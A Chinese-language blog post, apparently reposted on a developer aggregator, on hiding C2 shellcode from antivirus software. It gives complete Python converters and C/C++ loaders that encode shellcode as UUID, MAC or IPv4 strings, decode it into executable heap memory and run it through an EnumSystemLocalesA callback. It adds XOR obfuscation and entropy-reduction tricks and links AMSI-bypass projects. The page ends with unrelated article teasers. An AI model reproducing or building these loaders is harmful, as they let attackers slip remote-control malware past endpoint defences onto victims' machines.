免杀对抗-C2远控篇CC++SC转换格式UUID标识MAC物理IPV4地址减少熵值

参考文章:

https://github.com/INotGreen/Bypass-AMSI
https://mp.weixin.qq.com/s/oJ8eHdX8HGuk6dZv0kmFxg
https://kyxiaxiang.github.io/2022/12/14/AMSIandEtw
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

文章参考:

https://www.anquanke.com/post/id/262666

C/C++内存加载-UUID方式-ShellCode转换

通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。

1、先用python代码将shellcode转换成uuid值
2、命令python u.py payload.bin

from uuid import UUID
import sysif len(sys.argv) < 2:print("Usage: %s <shellcode_file>" % sys.argv[0])sys.exit(1)
with open(sys.argv[1], "rb") as f:chunk = f.read(16)print("{}const char* uuids[] =".format(' '*4))print(" {")while chunk:if len(chunk) < 16:padding = 16 - len(chunk)chunk = chunk + (b"\x90" * padding)print("{}\"{}\"".format(' '*8,UUID(bytes_le=chunk)))breakprint("{}\"{}\",".format(' '*8,UUID(bytes_le=chunk)))chunk = f.read(16)print(" };")

3、将uuid值填入const char* uuids[] = { “xxx” };

#include <Windows.h>
#include <Rpc.h>
#include <iostream>
#pragma comment(lib, "Rpcrt4.lib")
using namespace std;const char* uuids[] = { "xxx" };int main() {HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);void* hmem = HeapAlloc(hHeap, 0, 0x1000);printf("%p\n", hmem);DWORD_PTR ptr = (DWORD_PTR)hmem;int init = sizeof(uuids) / sizeof(uuids[0]);for (int i = 0; i < init; i++) {RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)ptr);if (status != RPC_S_OK) {printf("UuidFromStringA != RPC_S_OK\n");CloseHandle(hmem);return -1;}ptr += 16;}printf("[+] HexDump: \n");for (int i = 0; i < init * 16; i++) {printf("%02X ", ((unsigned char*)hmem)[i]);//((unsigned char*)hmem)[i] ^= 0x39;}EnumSystemLocalesA((LOCALE_ENUMPROCA)hmem, 0);CloseHandle(hmem);return 0;
}

4、生成文件exe,可以上线,但是杀软被杀
火绒 分离uuid
360 检测UuidFromStringA 使用动态api hook

先使用工具studype查看导出表
在这里插入图片描述

UuidFromStringA函数在RPCRT4.dll里面

C/C++内存加载-MAC方式-ShellCode转换

MAC地址也叫物理地址、硬件地址,由网络设备制造商生产时烧录在网卡的EPROM一种闪存芯片,通常可以通过程序擦写。IP地址与MAC地址在计算机里都是以二进制表示的,IP地址是32位的,而MAC地址则是48位(6个字节)的。

from macaddress import MAC
import sysif len(sys.argv) < 2:print("Usage: %s <shellcode_file>" % sys.argv[0])sys.exit(1)
with open(sys.argv[1], "rb") as f:chunk = f.read(6)print("{}const char* MAC[] =".format(' '*4))print(" {")while chunk:if len(chunk) < 6:padding = 6 - len(chunk)chunk = chunk + (b"\x90" * padding)print("{}\"{}\"".format(' '*8,MAC(chunk)))breakprint("{}\"{}\",".format(' '*8,MAC(chunk)))chunk = f.read(6)print(" };")

#include <Windows.h>
#include <stdio.h>
#include <Ip2string.h>
#pragma comment(lib, "Ntdll.lib")
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif
#define _CRT_SECURE_NO_WARNINGS
#pragma warning(disable:4996)int Error(const char* msg) {printf("%s (%u)", msg, GetLastError());return 1;
}
int main() {const char* MAC[] ={xxxx};int rowLen = sizeof(MAC) / sizeof(MAC[0]);PCSTR Terminator = NULL;DL_EUI48* LpBaseAddress2 = NULL;NTSTATUS STATUS;HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);void* hmem = HeapAlloc(hHeap, 0, 0x1000);DWORD_PTR ptr = (DWORD_PTR)hmem;for (int i = 0; i < rowLen; i++) {STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator,(DL_EUI48*)ptr);if (!NT_SUCCESS(STATUS)) {printf("[!] RtlEthernetStringToAddressA failed in %s result %x(% u)", MAC[i], STATUS, GetLastError());return FALSE;}ptr += 6;}printf("[+] HexDump: \n");for (int i = 0; i < 6 * rowLen; i++) {printf("%02X ", ((unsigned char*)hmem)[i]);}EnumSystemLocalesA((LOCALE_ENUMPROCA)hmem, 0);CloseHandle(hmem);return 0;
}

C/C++内存加载-IPV4方式-ShellCode转换

IPv4是一种无连接的协议,操作在使用分组交换的链路层(如以太网)上。此协议会尽最大努力交付数据包,意即它不保证任何数据包均能送达目的地,也不保证所有数据包均按照正确的顺序无重复地到达。IPv4使用32位(4字节)地址。

1、先用python代码将shellcode转换成ipv4值
2、命令python u.py payload.bin

from ipaddress import ip_address
import sysif len(sys.argv) < 2:print("Usage: %s <shellcode_file>" % sys.argv[0])sys.exit(1)
with open(sys.argv[1], "rb") as f:chunk = f.read(4)print("{}const char* IPv4s[] =".format(' '*4))print(" {")while chunk:if len(chunk) < 4:padding = 4 - len(chunk)chunk = chunk + (b"\x90" * padding)print("{}\"{}\"".format(' '*8,ip_address(chunk)))breakprint("{}\"{}\",".format(' '*8,ip_address(chunk)))chunk = f.read(4)print(" };")

3、将uuid值填入 const char* IPv4s[] =};

#include <Windows.h>
#include <stdio.h>
#include <Ip2string.h>
#pragma comment(lib, "Ntdll.lib")
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endifint main() {const char* IPv4s[] ={xxxxxx};PCSTR Terminator = NULL;PVOID LpBaseAddress = NULL;PVOID LpBaseAddress2 = NULL;NTSTATUS STATUS;HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);void* hmem = HeapAlloc(hHeap, 0, 0x1000);DWORD_PTR ptr = (DWORD_PTR)hmem;int init = sizeof(IPv4s) / sizeof(IPv4s[0]);for (int i = 0; i < init; i++) {RPC_STATUS STATUS = RtlIpv4StringToAddressA((PCSTR)IPv4s[i], FALSE,&Terminator, (in_addr*)ptr);if (!NT_SUCCESS(STATUS)) {printf("[!] RtlIpv6StringToAddressA failed in %s result %x (%u)",IPv4s[i], STATUS, GetLastError());return FALSE;}ptr += 4;}printf("[+] HexDump: \n");for (int i = 0; i < init * 4; i++) {printf("%02X ", ((unsigned char*)hmem)[i]);}EnumSystemLocalesA((LOCALE_ENUMPROCA)hmem, 0);CloseHandle(hmem);return 0;
}

熵和恶意软件

恶意软件会采取许多策略和技巧来从 AV 引擎的扫描中隐藏恶意软件。像shellcode加密,函数调用混淆之类的东西,像这种技术本质上是在加密和压缩数据,因此提高了数据的不可预测性/无序性,也就是提高了熵。所以我们可以根据熵值捕获文件,熵越大,数据就越有可能被混淆或加密,文件也就越有可能是恶意的,熵是一种简单有效的检测技术,但并不能完全识别所有恶意代码。因此,杀毒软件通常使用熵作为其他技术的补充,以更好地识别潜在的威胁。

1、识别项目:
https://github.com/langsasec/File-Entropy-Calculator
2、如何降低熵值:

使用uuid代码
先把shellcode使用ueditor 进行0x66异或
使用python脚本生成uuid值
脚本如下:

#include <Windows.h>
#include <Rpc.h>
#include <iostream>
#pragma comment(lib, "Rpcrt4.lib")
using namespace std;const char* uuids[] =
{xxxxx
};int main() {HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);void* hmem = HeapAlloc(hHeap, 0, 0x1000);printf("%p\n", hmem);DWORD_PTR ptr = (DWORD_PTR)hmem;int init = sizeof(uuids) / sizeof(uuids[0]);for (int i = 0; i < init; i++) {RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)ptr);if (status != RPC_S_OK) {printf("UuidFromStringA != RPC_S_OK\n");CloseHandle(hmem);return -1;}ptr += 16;}printf("[+] HexDump: \n");for (int i = 0; i < init * 16; i++) {printf("%02X ", ((unsigned char*)hmem)[i]);((unsigned char*)hmem)[i] ^= 0x66;printf("[+] HexDump: \n");printf("%02X ", ((unsigned char*)hmem)[i]);}EnumSystemLocalesA((LOCALE_ENUMPROCA)hmem, 0);CloseHandle(hmem);return 0;
}

使用Restorator 减少熵值

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/773135.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java锁与Redisson锁的坑

Java锁与Redisson锁的坑

文章目录 Redisson问题引入Java锁问题问题重现问题原因如何解决 Redisson问题引入 系统中我们经常需要使用分布式锁&#xff0c;一个不错的选择是使用redisson。 那么&#xff0c;像下面这样使用redisson锁有问题吗&#xff1f; 如果有问题&#xff0c;是什么问题呢&#xf…
阅读更多...
exec族

exec族

execl&#xff08;&#xff09;&#xff1b;------------------------------------------ 查看系统命令的路径&#xff1a; 只有错误时返回 -1 执行到execl 时&#xff0c;把execl 里的可执行程序的各个段&#xff08;数据、堆栈...&#xff09;替换掉本程序的a.out 实现镜像&a…
阅读更多...
【数据分享】1929-2023年全球站点的逐年平均露点(Shp\Excel\免费获取)

【数据分享】1929-2023年全球站点的逐年平均露点(Shp\Excel\免费获取)

气象数据是在各项研究中都经常使用的数据&#xff0c;气象指标包括气温、风速、降水、能见度等指标&#xff0c;说到气象数据&#xff0c;最详细的气象数据是具体到气象监测站点的数据&#xff01; 有关气象指标的监测站点数据&#xff0c;之前我们分享过1929-2023年全球气象站…
阅读更多...
vue3全局引入element-plus使用Message教程

vue3全局引入element-plus使用Message教程

文章目录 安装引入 Element Plus和组件样式示例注意安装与引入&#xff1a;按需引入&#xff1a;API 使用&#xff1a;样式问题&#xff1a;组件上下文&#xff1a;版本兼容性&#xff1a;错误处理&#xff1a; 这是 Element UI 的 Vue 3 版本。ElMessage 是 Element Plus 中的…
阅读更多...
四年创作,心路历程

四年创作,心路历程

四年创作&#xff0c;心路历程 前言初识收获日常憧憬 前言 这是我在这个网站整理的笔记,有错误的地方请指出&#xff0c;关注我&#xff0c;接下来还会持续更新。 作者&#xff1a;神的孩子都在歌唱 前言 今天打开csdn&#xff0c;发现官方发送了一条私信,原来我已经在计算机这…
阅读更多...
软件设计模式之备忘录模式

软件设计模式之备忘录模式

备忘录模式是一种行为型设计模式&#xff0c;用于捕获对象的内部状态并在需要时将其恢复。在软件开发中&#xff0c;备忘录模式允许我们在不破坏封装性的前提下&#xff0c;捕获对象的状态并将其保存在外部&#xff0c;从而可以在需要时将对象恢复到先前的状态。这种模式通常用…
阅读更多...
Vue.js 条件语句

Vue.js 条件语句

条件判断 v-if 条件判断使用 v-if 指令&#xff1a; <div id"app"><p v-if"seen">现在你看到我了</p><template v-if"ok"><h1>菜鸟教程</h1><p>学的不仅是技术&#xff0c;更是梦想&#xff01;&l…
阅读更多...
解决华为云服务器宝塔面板无法访问显示“此站点的连接不安全”问题

解决华为云服务器宝塔面板无法访问显示“此站点的连接不安全”问题

已经配置好安全组以及初始化宝塔面板&#xff0c;还是无法访问镜像管理页面&#xff0c;提示此站点的连接不安全。 解决方案 将地址https改为http即可进入。 成功登录后&#xff0c;开启面板SSL即可。
阅读更多...
SpringCloud系列(1)--SpringCloud简介

SpringCloud系列(1)--SpringCloud简介

1、微服务架构概述 微服务架构是一种架构模式&#xff0c;它提倡将单一应用程序划分成一组小的服务&#xff0c;服务之间互相协调、互相配合&#xff0c;为用户提供最终价值。每个服务运行在其独立的进程中&#xff0c;服务与服务间采用轻量级的通信机制互相协作&#xff08;通…
阅读更多...
excel创建和部分使用

excel创建和部分使用

一.excel导出是在开发中经常操作的内容,对于excel的导出也是有各种成熟的api组件 这里是最近的项目有通过ts处理,这里的内容通过ts ①引入const XlsxPopulate require("xlsx-populate"); const XLSXChart require("xlsx-chart"); 通过命令行操作, pnp…
阅读更多...
LabVIEW智能家居安防系统

LabVIEW智能家居安防系统

LabVIEW智能家居安防系统 随着科技的飞速发展和人们生活水平的不断提升&#xff0c;智能家居系统以其便利性和高效性&#xff0c;逐渐成为现代生活的新趋势。智能家居安防系统作为智能家居系统的重要组成部分&#xff0c;不仅能够提高家庭的安全性&#xff0c;还能为用户提供更…
阅读更多...
tensorflow | onnx模型转pb

tensorflow | onnx模型转pb

git: GitHub - onnx/onnx-tensorflow: Tensorflow Backend for ONNX 安装 onnx-tf pip install onnx-tf 命令转换 onnx->pb onnx-tf convert -i /path/to/input.onnx -o /path/to/output python 代码转换 import onnx from onnx_tf.backend import preparedef onnx2pb(…
阅读更多...
一、CentOS基础命令(1.文件和目录操作)

一、CentOS基础命令(1.文件和目录操作)

文章目录 一、CentOS的由来二、CentOS的优点和缺点三、基础操作命令1、文件和目录操作&#xff08;1.&#xff09;cd - 切换目录&#xff08;2.&#xff09;ls - 列出目录内容&#xff08;3.&#xff09;pwd - 显示当前目录&#xff08;4.&#xff09;mkdir - 创建目录&#xf…
阅读更多...
智能媒体api调用

智能媒体api调用

简单介绍一下 使用阿里智能媒体管理的api, 阿里云智能媒体管理(Intelligent Media Management,简称IMM),场景化封装数据智能分析管理,为云上文档、图片、视频数据,提供一站式数据处理、分析、检索等管控体验。 智能媒体管理针对不同行业的业务场景封装整合完整的处理能…
阅读更多...
数学算法(算法竞赛、蓝桥杯)--最大公约数,欧几里得算法

数学算法(算法竞赛、蓝桥杯)--最大公约数,欧几里得算法

1、B站视频链接&#xff1a;G05 最大公约数 欧几里得算法_哔哩哔哩_bilibili 题目链接&#xff1a;[NOIP2001 普及组] 最大公约数和最小公倍数问题 - 洛谷 #include <bits/stdc.h> using namespace std; typedef long long LL; LL x,y,ans;LL gcd(LL a,LL b){return b0?…
阅读更多...
【P1328】[NOIP2014 提高组] 生活大爆炸版石头剪刀布

【P1328】[NOIP2014 提高组] 生活大爆炸版石头剪刀布

[NOIP2014 提高组] 生活大爆炸版石头剪刀布 题目背景 NOIP2014 提高组 D1T1 题目描述 石头剪刀布是常见的猜拳游戏&#xff1a;石头胜剪刀&#xff0c;剪刀胜布&#xff0c;布胜石头。如果两个人出拳一样&#xff0c;则不分胜负。在《生活大爆炸》第二季第 8 集中出现了一种…
阅读更多...
linux用户管理命令2

linux用户管理命令2

useradd可以创建用户&#xff0c;其执行具体表现为在home文件夹下创建对应文件 那么有了useradd添加用户&#xff0c;自然有passwd添加用户密码 userdel可以删除用户&#xff0c;其中-r命令删除用户及其文件&#xff0c;-f命令可以强制删除用户&#xff0c;即使用户当前正在登录…
阅读更多...
RN封装的底部向上弹出的弹出层组件

RN封装的底部向上弹出的弹出层组件

组件代码 import React from react; import { View, StyleSheet, Modal, TouchableOpacity, Text, TouchableWithoutFeedback } from react-native;const BottomPopup ({ visible, onClose, children, leftButtonTitle, rightButtonTitle, onLeftButtonPress, onRightButtonP…
阅读更多...
Elasticsearch:语义搜索即服务处于卓越搜索的中心

Elasticsearch:语义搜索即服务处于卓越搜索的中心

作者&#xff1a;来自 Elastic Sherry Ger, Stephen Brown 对于许多企业来说&#xff0c;搜索卓越中心&#xff08;center of excellence - COE&#xff09;向其用户提供搜索服务&#xff0c;从不同的数据源中整理知识&#xff0c;并将搜索功能集成到其内部和外部应用程序中。…
阅读更多...
IDEA或Pycharm设置Python环境报Cannot set up a python SDK的某种解决方案——更换IDEA或Pycharm的版本

IDEA或Pycharm设置Python环境报Cannot set up a python SDK的某种解决方案——更换IDEA或Pycharm的版本

一、问题 先用conda指令创建了python3.10的环境&#xff0c;然后在IDEA或Pycharm里添加Python解释器环境报Cannot set up a python SDK的错误&#xff0c; 二、解决方法 发现在默认创建新环境选择Python版本时只能选择&#xff1a;2.7&#xff0c;3.6&#xff0c;3.7&#xff…
阅读更多...
最新文章

Copyright @ 2022~2023